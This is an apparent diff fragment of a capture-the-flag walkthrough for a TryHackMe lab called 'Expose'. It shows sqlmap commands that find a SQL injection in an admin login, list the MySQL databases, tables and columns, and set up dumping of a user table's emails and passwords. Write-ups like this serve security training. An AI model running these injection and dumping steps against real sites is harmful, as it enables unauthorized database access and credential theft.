Qusti/CTF_stuff/THM/Walkthrough_Expose.md

 "/admin, /admin_101 & /phpmyadmin" all have login pages but "/admin" states "Is this the right admin portal?".
 Testing "/admin" login does not do anything so let's look at the "/admin_101" next.
 Used burp to proxy the request to a file for sqlmap to test for injection vulnerabilities.
-`sqlmap -l req --level=4 --risk=2` tells that backend server seems to be MySQL `sqlmap -l req --dbms=MySQL --dbs` found "* expose, information_schema, mysql, performance_schema, phpmyadmin, sys*" databases.
+`sqlmap -l req --level=4 --risk=2` tells that backend server seems to be MySQL `sqlmap -l req --dbms=MySQL --dbs` found " expose, information_schema, mysql, performance_schema, phpmyadmin, sys" databases.
 `sqlmap -l req --dbms=MySQL -D expose,mysql,phpmyadmin --tables` dumps tables from databases "expose,mysql,phpmyadmin".
 I started with expose database.
 There were "user, config" tables so let's find out columns for "user" table.
 `sqlmap -l req --dbms=MySQL -D expose -T user --columns` found "created,email,id,password" columns so let's dump them!